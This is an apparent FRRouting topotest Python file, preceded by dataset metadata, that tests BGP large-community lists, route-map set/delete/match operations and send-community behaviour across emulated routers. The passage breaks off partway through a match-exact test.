| 1
| 0.008039
| false
| 0
| 0.011254
| 0.001608
| 0.028939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
6b62b2c5eeb9eaf252c1f83661497f63e26a726b
| 78,217
|
py
|
Python
|
src/frr/tests/topotests/bgp_large_community/test_bgp_large_community_topo_2.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
src/frr/tests/topotests/bgp_large_community/test_bgp_large_community_topo_2.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
src/frr/tests/topotests/bgp_large_community/test_bgp_large_community_topo_2.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright (c) 2019 by VMware, Inc. ("VMware")
# Used Copyright (c) 2018 by Network Device Education Foundation,
# Inc. ("NetDEF") in this file.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose with or without fee is hereby granted, provided
# that the above copyright notice and this permission notice appear
# in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
#
"""
test_bgp_large_community_topo_1.py: Test BGP large community.
Following tests are covered:
1. Verify the standard large-community-lists can permit or deny
large community attribute only in the correct canonical format.
2. Verify the expanded large-community-lists can permit or deny
large community attribute both in the correct canonical format
as well as REG_EX.
3. Verify that we can modify a large-community-list is in use,
to add/remove attribute value and it takes immediate effect.
4. Verify that large community attribute gets advertised when
route-map is applied to a neighbor and cleared when route-map
is removed.
5. Verify that duplicate BGP Large Community values are NOT be transmitted.
6. Verify if we want to remove all the large-community attributes from a
set of prefix we can set the value as NONE.
7. Redistribute connected and static routes in BGP process with a route-map
appending/removing L-comm attributes.
8. Verify if we want to remove specific large-community values from
a set of prefix we can make use of DELETE operation based on L-comm list.
9. Verify that if community values are NOT be advertised to a specific
neighbour, we negate send-community command.
(Send-community all is enabled by default for all neighbors)
10. Verify that large-community lists can not be configured without providing
specific L-community values(for match/delete operation in a route-map).
11. Verify that Match_EXACT clause should pass only if all of the L-comm
values configured (horizontally) in the community list is present in
the prefix. There must be no additional L-communities in the prefix.
12. Verify that Match_ALL clause should pass only if ALL of the L-comm values
configured (horizontally) in the community list is present in the prefix.
There could be additional L-communities in the prefix that are not present
in the L-comm list.
13. Verify that Match_ANY clause should pass only if at-least any one L-comm
value configured(vertically) in large-community list, is present in prefixes.
14. Verify large-community lists operation in a route-map with match RegEx
statements.
"""
import os
import sys
import pytest
import time
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
sys.path.append(os.path.join(CWD, "../lib/"))
# pylint: disable=C0413
# Import topogen and topotest helpers
# Import topoJson from lib, to create topology and initial configuration
from lib.topogen import Topogen, get_topogen
from lib.common_config import (
start_topology,
write_test_header,
write_test_footer,
reset_config_on_routers,
create_route_maps,
create_bgp_community_lists,
verify_bgp_community,
step,
verify_create_community_list,
delete_route_maps,
verify_route_maps,
create_static_routes,
check_address_types,
required_linux_kernel_version,
)
from lib.topolog import logger
from lib.bgp import verify_bgp_convergence, create_router_bgp, clear_bgp_and_verify
from lib.topojson import build_config_from_json
pytestmark = [pytest.mark.bgpd]
# Global variables
bgp_convergence = False
NETWORKS = {"ipv4": ["200.50.2.0/32"], "ipv6": ["1::1/128"]}
def setup_module(mod):
"""
Sets up the pytest environment
* `mod`: module name
"""
# Required linux kernel version for this suite to run.
result = required_linux_kernel_version("4.15")
if result is not True:
pytest.skip("Kernel requirements are not met")
testsuite_run_time = time.asctime(time.localtime(time.time()))
logger.info("Testsuite start time: {}".format(testsuite_run_time))
logger.info("=" * 40)
logger.info("Running setup_module to create topology")
# This function initiates the topology build with Topogen...
json_file = "{}/bgp_large_community_topo_2.json".format(CWD)
tgen = Topogen(json_file, mod.__name__)
global topo
topo = tgen.json_topo
# ... and here it calls Mininet initialization functions.
# Starting topology, create tmp files which are loaded to routers
# to start deamons and then start routers
start_topology(tgen)
# Creating configuration from JSON
build_config_from_json(tgen, topo)
# Checking BGP convergence
global bgp_convergence, ADDR_TYPES
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Api call verify whether BGP is converged
# Ipv4
bgp_convergence = verify_bgp_convergence(tgen, topo)
assert bgp_convergence is True, "setup_module :Failed \n Error:" " {}".format(
bgp_convergence
)
ADDR_TYPES = check_address_types()
logger.info("Running setup_module() done")
def teardown_module(mod):
"""
Teardown the pytest environment
* `mod`: module name
"""
logger.info("Running teardown_module to delete topology")
tgen = get_topogen()
# Stop toplogy and Remove tmp files
tgen.stop_topology()
logger.info(
"Testsuite end time: {}".format(time.asctime(time.localtime(time.time())))
)
logger.info("=" * 40)
#####################################################
#
# Testcases
#
#####################################################
def test_create_bgp_standard_large_community_list(request):
"""
Create standard large-community-list and verify it can permit
or deny large community attribute only in the correct canonical
format.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
reset_config_on_routers(tgen)
step("Create srtandard large community list")
input_dict = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "LC_1_STD",
"value": "2:1:1 2:1:2 1:2:3",
"large": True,
},
{
"community_type": "standard",
"action": "permit",
"name": "LC_2_STD",
"value": "3:1:1 3:1:2",
"large": True,
},
]
}
}
result = create_bgp_community_lists(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create srtandard large community list with in-correct values")
input_dict = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "LC_1_STD_ERR",
"value": "0:0:0",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
## TODO should fail
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
def test_create_bgp_expanded_large_community_list(request):
"""
Create expanded large-community-list and verify it can permit
or deny large community attribute both in the correct canonical
format as well as REG_EX
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create expanded large community list")
input_dict = {
"r4": {
"bgp_community_lists": [
{
"community_type": "expanded",
"action": "permit",
"name": "LC_1_EXP",
"value": "1:1:200 1:2:* 3:2:1",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
def test_modify_large_community_lists_referenced_by_rmap(request):
"""
This test is to verify that we can modify a large-community-list
is in use, add/remove attribute value and it takes immediate effect.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create standard large community list")
input_dict_1 = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "LC_DEL",
"value": "1:2:1 1:3:1 2:1:1 2:2:2 3:3:3",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_2 = {
"r1": {
"route_maps": {
"RM_R2_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "1:2:1 1:3:1 2:10:1 3:3:3 4:4:4 5:5:5",
"action": "additive",
}
},
}
]
}
},
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {"large_comm_list": {"id": "LC_DEL", "delete": True}},
}
]
}
},
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}],
"neighbor": {
"r2": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "RM_R2_OUT",
"direction": "out",
}
]
}
}
}
},
}
},
"ipv6": {
"unicast": {
"advertise_networks": [{"network": "1::1/128"}],
"neighbor": {
"r2": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "RM_R2_OUT",
"direction": "out",
}
]
}
}
}
},
}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify Community-list")
dut = "r4"
input_dict_4 = {"largeCommunity": "2:10:1 4:4:4 5:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_apply_and_remove(request):
"""
This test is to verify that large community attribute gets advertised when
route-map is applied to a neighbor and cleared when route-map is removed
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_1 = {
"r4": {
"route_maps": {
"RM_LC1": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "200:200:1 200:200:10 200:200:20000",
"action": "additive",
}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_2 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_LC1", "direction": "out"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_LC1", "direction": "out"}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r6"
input_dict_4 = {"largeCommunity": "200:200:1 200:200:10 200:200:20000"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Delete route map reference by community-list")
input_dict_3 = {"r4": {"route_maps": ["RM_LC1"]}}
result = delete_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify route map is deleted")
result = verify_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
for adt in ADDR_TYPES:
result = verify_bgp_community(
tgen, adt, dut, NETWORKS[adt], input_dict_4, expected=False
)
assert result is not True, (
"Testcase {} : Failed \n "
"largeCommunity is still present after deleting route-map \n Error: {}".format(
tc_name, result
)
)
write_test_footer(tc_name)
def test_duplicate_large_community_list_attributes_not_transitive(request):
"""
This test is to verify that duplicate BGP Large Community values
are NOT be transmitted.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_1 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "0:0:1 0:0:10 0:0:100 2:0:1 2:0:2 2:0:3"
" 2:0:4 2:0:5",
"action": "additive",
}
},
}
],
"RM_R4_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "0:0:1 0:0:10 0:0:10000 2:0:1 2:0:2",
"action": "additive",
}
},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_2 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
},
"r6": {
"dest_link": {
"r4": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
},
"r6": {
"dest_link": {
"r4": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r6"
input_dict_4 = {
"largeCommunity": "0:0:1 0:0:10 0:0:100 0:0:10000 2:0:1 2:0:2 2:0:3 2:0:4 2:0:5"
}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_set_none(request):
"""
This test is to verify if we want to remove all the large-community
attributes from a set of prefix we can set the value as NONE.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_1 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "0:0:1 0:0:10 0:0:100 2:0:1 2:0:2 2:0:3"
" 2:0:4",
"action": "additive",
}
},
}
]
}
},
"r6": {
"route_maps": {
"RM_R6_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {"large_community": {"num": "none"}},
}
]
}
},
}
result = create_route_maps(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_2 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
"r6": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r6": {
"route_maps": [
{"name": "RM_R6_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r6": {
"route_maps": [
{"name": "RM_R6_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify Community-list")
dut = "r6"
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], expected=False)
assert result is not True, (
"Testcase {} : Failed \n "
"Community-list is still present \n Error: {}".format(tc_name, result)
)
write_test_footer(tc_name)
def test_lcomm_lists_with_redistribute_static_connected_rmap(request):
"""
This test is to verify redistribute connected and static ipv4 routes
in BGP process with a route-map appending/removing L-comm attributes.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("create static routes")
input_dict = {
"r1": {
"static_routes": [
{"network": "200.50.2.0/32", "next_hop": "10.0.0.6"},
{"network": "1::1/128", "next_hop": "fd00:0:0:1::2"},
]
}
}
result = create_static_routes(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("redistribute static routes")
input_dict_1 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"redistribute": [
{
"redist_type": "static",
"attribute": "route-map RM_R2_OUT",
},
{
"redist_type": "connected",
"attribute": "route-map RM_R2_OUT",
},
]
}
},
"ipv6": {
"unicast": {
"redistribute": [
{
"redist_type": "static",
"attribute": "route-map RM_R2_OUT",
},
{
"redist_type": "connected",
"attribute": "route-map RM_R2_OUT",
},
]
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_3 = {
"r1": {
"route_maps": {
"RM_R2_OUT": [
{
"action": "permit",
"set": {"large_community": {"num": "55:55:55 555:555:555"}},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list for static and connected ipv4 route on" " r2")
input_dict_5 = {"largeCommunity": "55:55:55 555:555:555"}
if "ipv4" in ADDR_TYPES:
dut = "r2"
networks = ["200.50.2.0/32", "1.0.1.17/32"]
result = verify_bgp_community(tgen, "ipv4", dut, networks, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Verify large-community-list for static and connected ipv4 route" " on r4")
dut = "r4"
networks = ["200.50.2.0/32", "1.0.1.17/32"]
result = verify_bgp_community(tgen, "ipv4", dut, networks, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
if "ipv6" in ADDR_TYPES:
step("Verify large-community-list for static and connected ipv6 route" " on r2")
dut = "r2"
networks = ["1::1/128", "2001:db8:f::1:17/128"]
result = verify_bgp_community(tgen, "ipv6", dut, networks, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Verify large-community-list for static and connected ipv6 route" " on r4")
dut = "r4"
networks = ["1::1/128", "2001:db8:f::1:17/128"]
result = verify_bgp_community(tgen, "ipv6", dut, networks, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_set_delete(request):
"""
This test is to verify if we want to remove specific large-community
values from a set of prefix we can make use of DELETE operation based
on L-comm list
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("configure route_map")
input_dict_2 = {
"r6": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "Test",
"value": "1:2:1 1:1:10 1:3:100",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_3 = {
"r6": {
"route_maps": {
"RM_R6_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {"large_comm_list": {"id": "Test", "delete": True}},
}
]
}
},
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "1:2:1 1:1:10 1:3:100 2:1:1 2:2:2 2:3:3"
" 2:4:4 2:5:5",
"action": "additive",
}
},
}
]
}
},
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_4 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
"r6": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r6": {
"route_maps": [
{"name": "RM_R6_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r6": {
"route_maps": [
{"name": "RM_R6_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r6"
input_dict_5 = {"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_no_send_community(request):
"""
This test is to verify if we want to remove specific large-community
values from a set of prefix we can make use of DELETE operation based
on L-comm list
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r5": {
"route_maps": {
"RM_R6_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {"num": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r5": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {
"r5": {
"route_maps": [
{
"name": "RM_R6_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {
"r5": {
"route_maps": [
{
"name": "RM_R6_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r6"
input_dict_4 = {"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Configure neighbor for no-send-community")
input_dict_5 = {
"r5": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {"r5": {"no_send_community": "large"}}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {"r5": {"no_send_community": "large"}}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify Community-list")
for adt in ADDR_TYPES:
result = verify_bgp_community(
tgen, adt, dut, NETWORKS[adt], input_dict_4, expected=False
)
assert result is not True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_create_large_community_lists_with_no_attribute_values(request):
"""
This test is to verify that large-community lists can not be
configured without providing specific L-community values
(for match/delete operation in a route-map).
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create standard large commumity-list")
input_dict_1 = {
"r5": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "Test1",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
assert result is not True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_match_exact(request):
"""
This test is to verify that Match_EXACT clause should pass
only if all of the L-comm values configured (horizontally)
in the community list is present in the prefix. There must
be no additional L-communities in the prefix.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r2": {
"route_maps": {
"RM_R4_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {"num": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r2": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create standard large commumity-list")
input_dict_4 = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "EXACT",
"value": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"match": {
"large-community-list": ["EXACT"],
"match_exact": True,
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_6 = {
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
